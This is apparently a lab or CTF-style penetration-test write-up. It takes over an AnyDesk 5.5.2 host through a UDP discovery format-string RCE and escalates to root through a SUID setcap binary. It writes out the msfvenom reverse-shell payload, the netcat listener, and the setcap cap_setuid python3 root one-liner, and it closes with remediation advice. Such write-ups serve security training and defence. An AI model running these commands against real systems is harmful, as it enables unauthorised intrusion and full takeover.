AnyDesk 5.5.2 UDP discover RCE and setcap privilege escalation
Intermediate remote-access engagement: AnyDesk 5.5.2 format-string RCE over UDP discovery (CVE-2020-13160 class) yielded a shell; SUID setcap plus cap_setuid on a copied python3 completed root.
- Case files
- AnyDesk 5.5.2 UDP discover RCE and setcap privilege escalation
AnyDesk on TCP 7070 with discovery on UDP 50001 accepted a malicious discover packet that executed shellcode. Post-exploitation abused SUID setcap to grant cap_setuid to python3.
nmap and openssl confirmed AnyDesk on 7070; searchsploit returned the 5.5.2 RCE.
msfvenom produced shellcode; the Python discover exploit sent it to UDP 50001 and our listener caught the shell.
SUID /sbin/setcap granted cap_setuid+ep on a local python3 copy; setuid(0) spawned root.
Engagement summary
AnyDesk on TCP 7070 with discovery on UDP 50001 accepted a malicious discover packet that executed shellcode. Post-exploitation abused SUID setcap to grant cap_setuid to python3.
Host ANNIE (10.10.29.248) ran AnyDesk 5.5.2. After confirming the SSL listener on 7070, we used the public UDP discovery exploit (Exploit-DB / searchsploit AnyDesk 5.5.2 RCE — CVE-2020-13160 class format string) with msfvenom linux/x64 reverse shellcode (bad chars \x00\x25\x26). A reverse shell landed as annie. Enumeration showed /sbin/setcap SUID; copying /usr/bin/python3 and applying cap_setuid+ep allowed os.setuid(0) to a root shell.
Business impact
Unpatched remote-support agents are unauthenticated RCE on the corporate network. SUID setcap lets any local user mint dangerous capabilities. Patch or remove AnyDesk 5.5.2, restrict discovery exposure, and never ship setcap as SUID.
Service discovery and version pin
nmap and openssl confirmed AnyDesk on 7070; searchsploit returned the 5.5.2 RCE.
OPERATOR · NMAP
savvy@lab:~$ nmap -sC -sV 10.10.29.248
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH
7070/tcp open ssl/anydesk AnyDesk
savvy@lab:~$ openssl s_client -connect 10.10.29.248:7070
subject=... AnyDesk ...
savvy@lab:~$ searchsploit anydesk
AnyDesk 5.5.2 - Remote Code Execution
UDP discovery format-string RCE
msfvenom produced shellcode; the Python discover exploit sent it to UDP 50001 and our listener caught the shell.
OPERATOR · MSFVENOM
savvy@lab:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
Payload size: ... bytes
Saved as: shellcode (paste into exploit)
OPERATOR · EXPLOIT
# exploit targets AnyDesk discovery UDP/50001 with format-string + shellcode
savvy@lab:~$ nc -lvnp 4444
savvy@lab:~$ python3 anydesk_rce.py
savvy@lab:~$
savvy@lab:~$ id
uid=1000(annie) gid=1000(annie) groups=1000(annie)
SUID setcap to cap_setuid python
SUID /sbin/setcap granted cap_setuid+ep on a local python3 copy; setuid(0) spawned root.
OPERATOR · SETCAP
savvy@lab:~$ find / -perm -4000 -type f 2>/dev/null
/sbin/setcap
savvy@lab:~$ cp /usr/bin/python3 /home/annie/python3
savvy@lab:~$ /sbin/setcap cap_setuid+ep /home/annie/python3
savvy@lab:~$ getcap /home/annie/python3
/home/annie/python3 = cap_setuid+ep
savvy@lab:~$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@lab:~# id
uid=0(root) gid=1000(annie) groups=1000(annie)
Remediation
Upgrade or remove AnyDesk; block UDP 50001 at the edge where remote support is not required. Remove the setuid bit from setcap; audit file capabilities with getcap -r regularly.